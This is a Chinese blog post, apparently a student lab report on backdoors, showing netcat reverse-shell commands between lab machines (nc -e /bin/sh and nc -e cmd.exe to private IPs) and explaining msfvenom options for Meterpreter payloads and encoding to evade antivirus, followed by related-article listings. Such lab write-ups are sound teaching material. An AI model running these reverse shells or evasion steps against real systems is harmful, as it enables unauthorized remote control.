网络对抗技术-Exp2-后门原理与实践 20181314

最新推荐文章于 2023-04-18 09:38:22 发布
最新推荐文章于 2023-04-18 09:38:22 发布
阅读量341 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46014245/article/details/114820132
版权

一、实验内容

1.使用netcat获取主机操作Shell,cron启动

Windows获得Linux Shell

在Windows下使用ipconfig查看本机IP

win+r 输入cmd,打开监听 nc -l -p 1314

在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序

Windows成功获得kali的shell,利用lswhoami指令查看相关信息
在这里插入图片描述
Linux获得Windows Shell

在kali中使用ifconfig查看IP

打开监听nc -l -p 1314

在Windows中反弹连接kali,nc -e cmd.exe 192.168.121.133 1314

kali成功获得Windows的命令提示,可运行指令,如dir,ipconfig

在这里插入图片描述在这里插入图片描述
使用nc传输数据
Windows下监听1314端口,nc -l -p 1314

kali反弹连接到Windows的1314端口,nc 172.16.214.132 1314

连接建立成功,双方可以相互传输数据
在这里插入图片描述
Meterpreter

  • 后门就是一个程序。

  • 传统的理解是:有人编写一个后门程序,大家拿来用。后来有人编写一个平台能生成后门程序。这个平台把后门的

     基本功能(基本的连接、执行指令),
 扩展功能(如搜集用户信息、安装服务等功能),
 编码模式,
 运行平台,
 以及运行参数
 全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。

  • 典型的平台就包括有:

intersect
Metaspolit的msfvenom指令
Veil-evasion
在下面的任务三中我们就用到了Metaspolit的msfvenom指令
  • 参数说明
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
-e 使用的编码器,用于对shellcode变形,为了免杀。
-i 编码器的迭代次数。如上即使用该编码器编码5次。
-b badchar是payload中需要去除的字符。
LHOST 是反弹回连的IP
LPORT 是回连的端口
-f 生成文件的类型
>输出到哪个文件

二、实验内容

任务一:使用netcat获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

最低0.47元/天 解锁文章
rogers2333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20194311姜晨昊Exp2-后门原理实践
weixin_51927594的博客
03-28 1312
20194311姜晨昊Exp2-后门原理实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
2018-2019 Exp2 后门原理实践
weixin_34087301的博客
03-20 105
2018-2019 Exp2 后门原理实践 目录 一、实验内容说明及基础问题回答 二、工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Windows shell 使用nc传输数据 三、实验过程 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF mete...
Exp2后门原理实践
03-29 158
一、简单后门 1、ncat、socat的基础操作 工具介绍: netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 socat:类似于Netcat的加强版。 以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++ Meterpre...
Exp2 后门原理实践 20164311
weixin_30604651的博客
03-23 141
Exp2 后门原理实践 20164311 实验一:使用netcat获取主机操作Shell,cron启动 1.Windows获得Linux Shell (1)打开本机win10的cmd.exe,使用命令ipconfig查看win10的IP地址。 (2)并用命令ncat.exe -l -p 4311监听本机的4311端口...
Exp2 后门原理实践 20164309
a569847381的博客
03-22 333
准备工作: 使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130 使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131 实验内容 一、使用nc或netcat远程获取shell (1)win获得Linux shell 1.windows打开监听 进入文件夹 cd netcat ...
MSP-EXP430G2.rar
03-08
MSP430G2553 LaunchPad (MSP-EXP430G2)开发版官方资料全集,包括原理图和相关示例代码
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本
01-22
phpstudy PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
MSP-EXP430G2
12-26
MSP-EXP430G2原理图及。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip
最新发布
01-22
phpstudy:PHPStudy_BackDoor_EXP PHPstudy后门利用脚本.zip
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 .zip
01-22
phpstudy
Exp2 后门原理实践 20164320 王浩
weixin_34080571的博客
03-24 205
一、实践基本内容 1.实践目标 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝...
Exp2 后门原理实践 20204308李文艳
m0_61155000的博客
03-23 313
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
20145222 黄亚奇 《网络攻防》 后门原理实践
weixin_34242509的博客
03-18 152
20145222 黄亚奇 《网络攻防》 后门原理实践 实验内容概述 简单实用netcat和socat获取靶机shell,并实现任务计划启动; 使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等。 操 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 通过邮件发送...
20145322《网络对抗技术》免杀原理实践
03-26 80
20145322《网络对抗技术》免杀原理实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。 (2)免杀是做什么? 通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳,或用其他语言(如veil-evasion...
20145312 《网络对抗后门原理实践
acn19249的博客
03-19 133
20145312 《网络对抗后门原理实践 基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 在所谓软件之家的网站下载应用软件时,安装过程中附带的可能就有后门程序。 垃圾邮件中的链接点开后可能就安装了后门程序。 2.例举你知道的后门如何启动起来(win及linux)的方式? windows:通过启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序,...
20155232《网络对抗Exp2 后门原理实践
aoqian2533的博客
03-31 107
20155232《网络对抗Exp2 后门原理实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(win及linux)的方式? 更改注册表,自启动方式。 跟正常的软件捆绑起来 3.Meterpreter有哪些给你映像深刻的功能? 击键记录还有获取摄像头权限进行拍照。击键记录可以在这段时间内截...
c语言exp2是什么函数,C ++ STL中的exp2()函数
weixin_30456153的博客
05-20 4070
在本文中,我们将讨论C ++ STL中用于复数的std::exp2()函数的工作,语法和示例。什么是std::exp2()?用于复数的std::exp2()函数是C ++ STL中的内置函数,该函数在或头文件中定义。exp2()函数用于计算二进制指数函数,该二进制指数函数是给定数字的以2为底的指数函数。此函数返回double,float或long double值(即)。语法exp2(double...
Exp2-后门原理实践
showmaker999的博客
04-18 411
Socat 的主要特点就是在两个数据流之间建立双向通道,且支持众多协议和链接方式,如IP,TCP,UDP,IPv6,pipe,exec,system,open,proxy,openssl,socket等。这个问题可能不是因为MSF而产生的,实践五中,在运行MSF后我发现我的pwn源文件也无权限运行了,所以我怀疑可能是MSF,也可能是下载pwn文件时导致,最终按照网上的资料(后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。
metasploit实操交流
朝阳似锦 晖映山河
03-15 449
文章目录端口扫描:SMB扫描_获取系统信息服务识别(ssh)密码嗅探SNMP扫描与枚举SMB登陆验证VNC身份验证远程代码执行MJDJ文件解析远程代码执行口令安全hash值传递渗透(相关内容戳我)多种后门的生成内网渗透(获得shell前提下)反反病毒(免杀)特殊的xss(键盘记录)维持访问(访问后门)如有疑惑可以私信交流 启动 msfconsole 更新 ./msfupdate 退回上一级 quit 端口扫描: 调用Nmap扫描:可以参照一篇详细的文章戳我 基础扫描: nmap -v -sV 加上要扫描的i
MSP-EXP430G2电机驱动
07-28
MSP-EXP430G2是德州仪器提供的开发工具,也称为LaunchPad,用于学习和实践如何使用其微控制器。在本篇文章中,我们介绍了如何将伺服电机与MSP430G2 LaunchPad开发板进行连接。伺服电机是一种包含了直流电机、位置控制系统和转动机构的电机。在我们的文章中,我们使用的是SG90伺服电机,它是一款180度伺服器,可以将轴从0-180度定位。因此,您可以使用MSP-EXP430G2开发板来驱动伺服电机并控制其位置。\[1\]\[3\] #### 引用[.reference_title] - *1* *3* [使用MSP430G2 LaunchPad开发板驱动伺服电机的方法](https://blog.csdn.net/woshi_ziyu/article/details/81206876)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [使用MSP430G2 LaunchPad开发板连接步进电机的方法](https://blog.csdn.net/woshi_ziyu/article/details/81325750)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值